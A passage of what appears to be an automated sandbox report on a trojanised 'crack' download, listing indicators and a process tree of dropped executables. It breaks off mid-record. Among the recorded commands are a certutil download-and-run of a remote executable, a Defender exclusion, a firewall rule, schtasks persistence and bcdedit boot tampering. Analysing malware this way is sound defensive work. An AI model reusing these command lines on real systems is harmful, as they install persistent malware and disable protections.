3313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe

Runs .reg file with regedit 2 IoCs

pid	Process
5488	regedit.exe
5716	regedit.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
4568	PING.EXE
4232	PING.EXE
1712	PING.EXE
1320	PING.EXE
5660	PING.EXE
2640	PING.EXE

Script User-Agent 9 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	105	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	159	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	181	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	214	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	102	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	103	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	128	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	201	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2064	file.exe
2064	file.exe
4440	key.exe
4440	key.exe
2064	file.exe
2064	file.exe
2064	file.exe
2064	file.exe
2064	file.exe
2064	file.exe
4640	2396.tmp.exe
4640	2396.tmp.exe
1360	1615147832072.exe
1360	1615147832072.exe
4052	1615147834087.exe
4052	1615147834087.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe
1680	multitimer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeDebugPrivilege	2064	file.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeImpersonatePrivilege	4440	key.exe
Token: SeTcbPrivilege	4440	key.exe
Token: SeChangeNotifyPrivilege	4440	key.exe
Token: SeCreateTokenPrivilege	4440	key.exe
Token: SeBackupPrivilege	4440	key.exe
Token: SeRestorePrivilege	4440	key.exe
Token: SeIncreaseQuotaPrivilege	4440	key.exe
Token: SeAssignPrimaryTokenPrivilege	4440	key.exe
Token: SeShutdownPrivilege	3844	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3844	msiexec.exe
Token: SeSecurityPrivilege	2508	msiexec.exe
Token: SeCreateTokenPrivilege	3844	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3844	msiexec.exe
Token: SeLockMemoryPrivilege	3844	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3844	msiexec.exe
Token: SeMachineAccountPrivilege	3844	msiexec.exe
Token: SeTcbPrivilege	3844	msiexec.exe
Token: SeSecurityPrivilege	3844	msiexec.exe
Token: SeTakeOwnershipPrivilege	3844	msiexec.exe
Token: SeLoadDriverPrivilege	3844	msiexec.exe
Token: SeSystemProfilePrivilege	3844	msiexec.exe
Token: SeSystemtimePrivilege	3844	msiexec.exe
Token: SeProfSingleProcessPrivilege	3844	msiexec.exe
Token: SeIncBasePriorityPrivilege	3844	msiexec.exe
Token: SeCreatePagefilePrivilege	3844	msiexec.exe
Token: SeCreatePermanentPrivilege	3844	msiexec.exe
Token: SeBackupPrivilege	3844	msiexec.exe
Token: SeRestorePrivilege	3844	msiexec.exe
Token: SeShutdownPrivilege	3844	msiexec.exe
Token: SeDebugPrivilege	3844	msiexec.exe
Token: SeAuditPrivilege	3844	msiexec.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
3844	msiexec.exe
3932	chashepro3.tmp
4900	Setup3310.tmp
2232	IBInstaller_97039.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
1056	vpn.tmp
4536	kk1zazd4ft2.tmp
840	vict.tmp

Suspicious use of SetWindowsHookEx 31 IoCs

pid	Process
4944	Setup.exe
3604	C0CA61A12E4C8B38.exe
3820	C0CA61A12E4C8B38.exe
4524	firefox.exe
1360	1615147832072.exe
4788	firefox.exe
4052	1615147834087.exe
1416	kk1zazd4ft2.exe
212	chashepro3.exe
4968	vict.exe
5056	Setup3310.exe
4632	askinstall24.exe
3700	IBInstaller_97039.exe
4900	Setup3310.tmp
3932	chashepro3.tmp
4536	kk1zazd4ft2.tmp
840	vict.tmp
2232	IBInstaller_97039.tmp
4564	vpn.exe
1056	vpn.tmp
4920	Brava.exe
5016	8.exe
3252	chrome_proxy.exe
1292	app.exe
5172	ThunderFW.exe
6020	winlthst.exe
6108	wimapi.exe
5240	Setup.exe
968	Setup.tmp
5700	03rmxcykcrh.exe
5176	03rmxcykcrh.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4764 wrote to memory of 2796	4764	Spyhunter_4_5_7_crack.exe	78
PID 4764 wrote to memory of 2796	4764	Spyhunter_4_5_7_crack.exe	78
PID 4764 wrote to memory of 2796	4764	Spyhunter_4_5_7_crack.exe	78
PID 2796 wrote to memory of 932	2796	cmd.exe	81
PID 2796 wrote to memory of 932	2796	cmd.exe	81
PID 2796 wrote to memory of 932	2796	cmd.exe	81
PID 2796 wrote to memory of 1012	2796	cmd.exe	82
PID 2796 wrote to memory of 1012	2796	cmd.exe	82
PID 2796 wrote to memory of 1012	2796	cmd.exe	82
PID 2796 wrote to memory of 884	2796	cmd.exe	83
PID 2796 wrote to memory of 884	2796	cmd.exe	83
PID 2796 wrote to memory of 884	2796	cmd.exe	83
PID 2796 wrote to memory of 1184	2796	cmd.exe	84
PID 2796 wrote to memory of 1184	2796	cmd.exe	84
PID 2796 wrote to memory of 1184	2796	cmd.exe	84
PID 932 wrote to memory of 4440	932	keygen-pr.exe	85
PID 932 wrote to memory of 4440	932	keygen-pr.exe	85
PID 932 wrote to memory of 4440	932	keygen-pr.exe	85
PID 1184 wrote to memory of 2064	1184	keygen-step-4.exe	86
PID 1184 wrote to memory of 2064	1184	keygen-step-4.exe	86
PID 1184 wrote to memory of 2064	1184	keygen-step-4.exe	86
PID 884 wrote to memory of 4496	884	keygen-step-3.exe	87
PID 884 wrote to memory of 4496	884	keygen-step-3.exe	87
PID 884 wrote to memory of 4496	884	keygen-step-3.exe	87
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4440 wrote to memory of 4584	4440	key.exe	89
PID 4496 wrote to memory of 4568	4496	cmd.exe	91
PID 4496 wrote to memory of 4568	4496	cmd.exe	91
PID 4496 wrote to memory of 4568	4496	cmd.exe	91
PID 2064 wrote to memory of 3824	2064	file.exe	93
PID 2064 wrote to memory of 3824	2064	file.exe	93
PID 2064 wrote to memory of 3824	2064	file.exe	93
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 3824 wrote to memory of 4640	3824	2396.tmp.exe	95
PID 2064 wrote to memory of 1016	2064	file.exe	96
PID 2064 wrote to memory of 1016	2064	file.exe	96
PID 2064 wrote to memory of 1016	2064	file.exe	96
PID 1016 wrote to memory of 4232	1016	cmd.exe	99
PID 1016 wrote to memory of 4232	1016	cmd.exe	99
PID 1016 wrote to memory of 4232	1016	cmd.exe	99

C:\Users\Admin\AppData\Local\Temp\Spyhunter_4_5_7_crack.exe
"C:\Users\Admin\AppData\Local\Temp\Spyhunter_4_5_7_crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:932
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4440
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:4584
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1012
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4496
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:4568
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2064
    - - C:\Users\Admin\AppData\Roaming\2396.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\2396.tmp.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3824
      - C:\Users\Admin\AppData\Roaming\2396.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\2396.tmp.exe"
        6⤵
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1016
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:4232
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies system certificate store
      Suspicious use of SetWindowsHookEx
      PID:4944
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        5⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3844
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:3604
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4524
      - C:\Users\Admin\AppData\Roaming\1615147832072.exe
        
        "C:\Users\Admin\AppData\Roaming\1615147832072.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615147832072.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1360
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4788
      - C:\Users\Admin\AppData\Roaming\1615147834087.exe
        
        "C:\Users\Admin\AppData\Roaming\1615147834087.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615147834087.txt"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4052
      - C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5172
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
        6⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:5660
    - - C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
        
        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
        5⤵
        Executes dropped EXE
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:3820
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:4620
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
        6⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        7⤵
        Runs ping.exe
        
        PID:1320
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
        5⤵
        
        PID:2136
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        6⤵
        Runs ping.exe
        
        PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
      4⤵
      Executes dropped EXE
      PID:4940
    - - C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1916
      - C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe" 1 3.1615147620.60453264dc506 101
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H1LE6BSJ01\multitimer.exe" 2 3.1615147620.60453264dc506
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\ofjeicpph3f\r5a4soiop3w.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ofjeicpph3f\r5a4soiop3w.exe" 57a764d042bf8
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:1612
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "C:\Program Files\QH7COMMSFS\QH7COMMSF.exe" 57a764d042bf8 & exit
        9⤵
        
        PID:672
        
        C:\Program Files\QH7COMMSFS\QH7COMMSF.exe
        
        "C:\Program Files\QH7COMMSFS\QH7COMMSF.exe" 57a764d042bf8
        10⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5708
        
        C:\Users\Admin\AppData\Local\Temp\qjyvd1ps40x\askinstall24.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qjyvd1ps40x\askinstall24.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4632
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\j13tgo0mrqm\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\j13tgo0mrqm\vpn.exe" /silent /subid=482
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\is-EM5PB.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EM5PB.tmp\vpn.tmp" /SL5="$103B2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\j13tgo0mrqm\vpn.exe" /silent /subid=482
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:5876
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:5020
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:2632
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:6688
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\vrt435dfft0\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vrt435dfft0\app.exe" /8-23
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Muddy-Hill"
        9⤵
        
        PID:5712
        
        C:\Program Files (x86)\Muddy-Hill\7za.exe
        
        "C:\Program Files (x86)\Muddy-Hill\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        9⤵
        
        PID:228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Muddy-Hill\app.exe" -map "C:\Program Files (x86)\Muddy-Hill\WinmonProcessMonitor.sys""
        9⤵
        
        PID:2564
        
        C:\Program Files (x86)\Muddy-Hill\app.exe
        
        "C:\Program Files (x86)\Muddy-Hill\app.exe" -map "C:\Program Files (x86)\Muddy-Hill\WinmonProcessMonitor.sys"
        10⤵
        
        PID:5844
        
        C:\Program Files (x86)\Muddy-Hill\7za.exe
        
        "C:\Program Files (x86)\Muddy-Hill\7za.exe" e -p154.61.71.51 winamp.7z
        9⤵
        
        PID:4000
        
        C:\Program Files (x86)\Muddy-Hill\app.exe
        
        "C:\Program Files (x86)\Muddy-Hill\app.exe" /8-23
        9⤵
        
        PID:388
        
        C:\Program Files (x86)\Muddy-Hill\app.exe
        
        "C:\Program Files (x86)\Muddy-Hill\app.exe" /8-23
        10⤵
        
        PID:3084
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        11⤵
        
        PID:6248
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        12⤵
        
        PID:836
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe /8-23
        11⤵
        
        PID:6908
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        12⤵
        Creates scheduled task(s)
        
        PID:5880
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        12⤵
        Creates scheduled task(s)
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        12⤵
        
        PID:4204
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6224
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5852
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:7000
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6348
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:5748
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        13⤵
        Modifies boot configuration data using bcdedit
        
        PID:6056
        
        C:\Windows\system32\bcdedit.exe
        
